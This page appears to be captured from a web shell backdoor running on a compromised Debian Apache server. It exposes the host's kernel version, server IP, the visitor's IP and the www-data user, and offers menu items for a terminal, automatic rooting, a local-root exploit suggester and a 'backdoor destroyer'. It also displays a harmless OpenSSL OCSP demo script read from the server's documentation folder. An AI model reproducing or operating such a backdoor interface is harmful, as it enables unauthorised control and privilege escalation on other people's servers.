Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
libssl-doc /
demos /
certs /
Delete
Unzip
Name
Size
Permission
Date
Action
apps
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
README
860
B
-rw-r--r--
2019-09-10 15:16
ca.cnf
2.19
KB
-rw-r--r--
2019-09-10 15:16
mkcerts.sh
3.8
KB
-rw-r--r--
2019-09-10 15:16
ocspquery.sh
798
B
-rw-r--r--
2019-09-10 15:16
ocsprun.sh
392
B
-rw-r--r--
2019-09-10 15:16
Save
Rename
# Example querying OpenSSL test responder. Assumes ocsprun.sh has been # called. OPENSSL=../../apps/openssl OPENSSL_CONF=../../apps/openssl.cnf export OPENSSL_CONF # Send responder queries for each certificate. echo "Requesting OCSP status for each certificate" $OPENSSL ocsp -issuer intca.pem -cert client.pem -CAfile root.pem \ -url http://127.0.0.1:8888/ $OPENSSL ocsp -issuer intca.pem -cert server.pem -CAfile root.pem \ -url http://127.0.0.1:8888/ $OPENSSL ocsp -issuer intca.pem -cert rev.pem -CAfile root.pem \ -url http://127.0.0.1:8888/ # One query for all three certificates. echo "Requesting OCSP status for three certificates in one request" $OPENSSL ocsp -issuer intca.pem \ -cert client.pem -cert server.pem -cert rev.pem \ -CAfile root.pem -url http://127.0.0.1:8888/